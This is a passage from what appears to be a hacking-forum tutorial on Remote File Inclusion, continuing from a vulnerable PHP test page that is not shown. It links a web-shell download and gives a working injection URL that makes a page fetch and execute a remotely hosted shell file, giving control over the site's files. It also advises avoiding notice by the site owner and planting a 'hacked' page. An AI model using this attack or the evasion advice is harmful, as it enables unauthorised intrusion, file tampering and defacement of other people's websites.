Upload that to your server and save it as RFI.php.
When you access that file via a web browser it will look like this
Very fancy
But the idea of this page is to open a file in the same page kinda like an iframe. If we browse to http://www.mysite.com/rfi.php?page=http://www.google.co.uk/ (Take note of the location of http://www.google.co.uk/)
This page is going to run anything that is after rfi.php?page= in the url. With that in mind we now understand that a shell can be executed from the server.
So now you must upload a shell to our server, if we don't already own a shell we can download a free shell here http://www.multiupload.com/REU9V5EQAF
Ok now it is uploaded to our server we must now inject it into the RFI test sheet. Like this http://www.mysite.com/rfi.php?page=http://www.mysite.com/shell.txt? we include the last ? to tell the page to run the code and not to display the page/code.
Now you will see that the site has executed the shells code as if it was part of the original page .
Meaning we can now upload,edit,delete any file we please to.
Do not change the index of the site as the owner may catch you. Upload a hacked.html page .
![[Image: 1_23.jpg]](http://b.imagehost.org/0006/1_23.jpg)
![[Image: tongue7689.gif]](http://www.crackhackforum.com/images/smilies/tongue7689.gif)
![[Image: 2_7.jpg]](http://b.imagehost.org/0050/2_7.jpg)
![[Image: abiggrin.gif]](http://www.crackhackforum.com/images/smilie_new/abiggrin.gif)
![[Image: 1_23.jpg]](http://d.imagehost.org/0910/1_23.jpg)
![[Image: smile7689.gif]](http://www.crackhackforum.com/images/smilies/smile7689.gif)